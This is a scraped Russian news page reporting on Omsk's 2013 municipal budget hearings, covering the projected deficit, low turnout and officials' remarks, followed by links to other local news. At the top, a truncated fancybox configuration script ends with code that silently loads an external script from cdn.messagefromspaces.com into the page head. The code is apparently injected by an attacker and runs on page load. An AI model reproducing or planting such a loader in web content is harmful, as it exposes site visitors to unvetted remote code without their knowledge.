, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 15 августа, 2018 года
30 ноября, 2012 Городские новости

В 2013 году дефицит бюджета Омска достигнет предельного значения

В следующем году дефицит городского бюджета достигнет предельного значения. Расходная часть превышает возможности города на 1 млрд рублей.

Сегодня, 30 ноября, в Омском городском Совете прошли публичные слушания по городскому бюджету на 2013 год. Обсудить главный финансовый документ города и поделиться своими предложениями по его формированию захотели всего 77 человек. Такой низкой явки на слушаниях не смог припомнить ни один из участников предыдущих «баталий» о бюджете. Логическое объяснение полупустому залу попытался найти председатель комитета Горсовета по финансово-бюджетным вопросам Юрий Федотов.

– Я настоял, чтобы мы не наполняли зал «организованными» людьми, пригласили минимум чиновников и дали возможность прийти максимальному числу омичей, но явки высокой не было никогда, в том числе и на слушаниях по исполнению бюджета 2011 года, – объяснил депутат. – Мне всегда хотелось, чтобы омичи более активно участвовали в слушаниях. Возможно, нам надо более активно вовлекать горожан в обсуждение, тогда и появятся интересные идеи и предложения.

Предложений оказалось немного. Выступить с докладом, помимо официальных лиц, пожелали всего два общественника. Не дождались пришедшие ни «баталий», ни хоть какого-то намека на заявленные в программе «прения». Никто не стал вступать в дискуссию и с постоянным гостем парламентских комитетов, председателем Омского общественного городского совета Игорем Басовым, жестко оценившим деятельность нынешней горадминистрации.

– Город становится более неблагоприятным для проживания и ведения бизнеса, – попытался внести смуту Басов. – Прошел 2012-й год, а городские проблемы так и не решены: ни с транспортом, ни с дошкольным образованием. Посмотрите, земельные участки под остановочными комплексами не оформлены, продолжается коммерциализация пассажирского транспорта, групповые помещения для дошкольников пустуют.

Однако конкретных предложений по поправкам в городской бюджет от общественника так и не последовало. В целом, параметры бюджета-2013, которые директор департамента финансов Инна Парыгина уже представляла на заседаниях комитетов городского парламента, существенных изменений не претерпели. Доходы города в следующем году составят 11,5 млрд рублей, расходы – 12,4 млрд. По-прежнему основным источником поступления денег в казну является налог на доходы физических лиц. Он формирует почти половину всего городского бюджета (до 5 млрд рублей). Лидером расходов, в отличие от областного бюджета, станет образование (в области – здравоохранение), его профинансируют на 6,2 млрд рублей. На ЖКХ город потратит более 830 млн рублей, на развитие физкультуры и спорта – 517 млн, на благоустройство – 438 млн, на культуру и кинематографию – 427 млн.

Подготовка к 300-летию Омска «съест» еще 472 млн рублей – средства пойдут на строительство двух детских садов на Левобережье, крытого катка на улице Бархатовой, плавательного бассейна в школе №124 и реконструкцию Дворца культуры Кировского округа.

Все без исключения спикеры отметили чудовищно низкий уровень доходной части обсуждаемого бюджета. Кто-то сообщил об этом мягче, как, например, вице-мэр Александр Турко («потребности значительно превышают возможности»), кто-то – жестче, как депутат Горсовета Юрий Федотов, заявивший, что сейчас депутатам приходится решать вопросы «выживания и поддержания штанов».

– По бюджету мы бедный город, как бы больно не было это говорить. Я вижу динамику – она, к сожалению, отрицательная. Когда мы спорим о перемещениях статей в бюджете, это, знаете, как тришкин кафтан – распределяем, а принципиальных изменений нет, – отметил депутат Федотов. – Бюджетная обеспеченность на жителя города у нас одна из самых низких среди крупных городов. И пока источников пополнения я не вижу.

Инна Парыгина оказалась настроена более оптимистично: вице-мэр уверена, что дополнительные доходы город отыскать сможет – они помогут спасти город от неминуемого банкротства и дадут возможность снизить запланированную сумму заемных средств. Пока же, рискуя, департамент финансов заложил в будущий бюджет максимальный дефицит в размере 871 млн рублей. Общая же задолженность бюджета по кредитам на сегодня составляет 2,1 млрд рублей

– Вопрос целесообразности привлечения дополнительных кредитных ресурсов на погашение бюджетного дефицита рассматривается, – сообщила после слушаний Парыгина. – В бюджете я, конечно, запланировала предельный объем привлечения кредитов, но, как правило, в этом город не нуждается. Так, в текущем году мы за счет собственных доходов скорректировали бюджет на 900 млн рублей. На конец года всегда выходят дополнительные источники.

Теперь проект бюджета детально рассмотрят на заседании комитета по финансово-бюджетным вопросам. Как признался его председатель Юрий Федотов, скорее всего, городские финансы депутатам придется утверждать в несколько измененном варианте. Депутата не устраивают некоторые расходные статьи бюджета, которыми он предложит пожертвовать для «перераспределения на элементарное».
Источник: http://omskinform.ru/news/52572

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Городские новости

  • v-omske-zaderzhali-pyanogo-inspektora-kinologa-za-rulem В Омске задержали пьяного инспектора-кинолога за рулем

    Сегодня утром в Кормиловке сотрудниками ГИБДД был задержан инспектор-кинолог, управлявший «жигулями» в состоянии алкогольного опьянения. После прохождения медицинского освидетельстования в его отношении был составлен протокол об административном правонарушении. По данному... Подробнее »

  • pogoda-v-omske Погода в Омске

    Климат Омска определяется его географическим положением, город находится на низменной равнине в южной стороне западной Сибири в значительном отдалении от открытых водоемов, и характеризуется как резко континентальный. Город равнодоступен как... Подробнее »

  • iz-za-snegopadov-i-gololeda-omsk-stoit-v-probkax Из-за снегопадов и гололеда Омск стоит в пробках

    Сегодня рано утром из-за мощного снегопада и гололёда Омск парализовали пробки. Их сила достигла восьми баллов, что является абсолютных рекордом для города. Сотни автомобилистов ещё не успели «переобуть» свои машины,... Подробнее »

  • v-omske-vse-taki-otkryli-pamyatnik-kolchaku В Омске все таки открыли памятник Колчаку

    Сегодня, 4 ноября, состоялось торжественное открытие памятника Александру Колчаку. Скульптура была установлена еще в середине октября у ресторана «Колчакъ» буквально в нескольких сотнях метров от резиденции верховного правителя России. Произведение,... Подробнее »

  • v-omske-otkroetsya-elektronnyj-universitet В Омске откроется электронный университет

    Ректоры шести вузов Омской области согласились объединиться для создания регионального электронного университета, сообщили «Сибинфо» в областном министерстве образования. 1 ноября в министерстве образования Омской области был подписан учредительный договор ассоциации... Подробнее »